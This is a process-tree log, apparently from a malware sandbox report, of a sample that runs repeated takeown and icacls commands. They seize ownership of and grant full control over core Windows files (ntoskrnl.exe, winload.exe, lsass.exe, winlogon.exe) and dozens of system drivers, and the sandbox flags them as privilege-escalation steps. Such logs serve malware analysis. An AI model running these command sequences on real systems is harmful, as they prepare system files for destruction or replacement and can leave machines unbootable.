C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant "Admin:F"3⤵PID:788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:1516
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:1472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:1876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:2852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:1688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"3⤵PID:708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:1432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:2908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:1320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:2900
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:1312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:1648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:2056
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:2596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:1548
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"3⤵PID:1188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"3⤵PID:736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:2656
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"3⤵PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:2632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:2976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:2188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵PID:2804
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:2616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵PID:2480
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:2212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:2972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:1960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:1856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:1620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:2984
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:2608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵PID:1624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:1756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:1884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵PID:2752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"3⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:1328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵PID:1792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:2844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵PID:3000
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:2800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit2⤵PID:1416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arc.sys3⤵PID:2304
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:3036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵PID:976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:2256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:2184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"3⤵PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit2⤵PID:1264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ataport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit2⤵PID:2544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\b57nd60a.sys3⤵PID:384
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:1632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵PID:2592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:1188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit2⤵PID:2980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\blbdrive.sys3⤵
- Possible privilege escalation attempt
PID:752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:2976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit2⤵PID:1628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltLo.sys3⤵PID:284
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit2⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltUp.sys3⤵PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:2780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit2⤵PID:2808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerId.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit2⤵PID:1908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerWdm.sys3⤵
- Modifies file permissions
PID:1460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit2⤵PID:2984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbMdm.sys3⤵
- Possible privilege escalation attempt
PID:2464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit2⤵PID:2876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbSer.sys3⤵PID:2828
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵PID:1892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵PID:1792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"3⤵PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:2296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:2616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:788
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:2608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:2024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵PID:576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit2⤵PID:856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmdide.sys3⤵
- Modifies file permissions
PID:2644
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:1760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit2⤵PID:976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\compbatt.sys3⤵PID:3028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"3⤵PID:1232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit2⤵PID:1860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CompositeBus.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:2860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"3⤵PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit2⤵PID:2888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crcdisk.sys3⤵PID:1108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"3⤵PID:752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:1144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
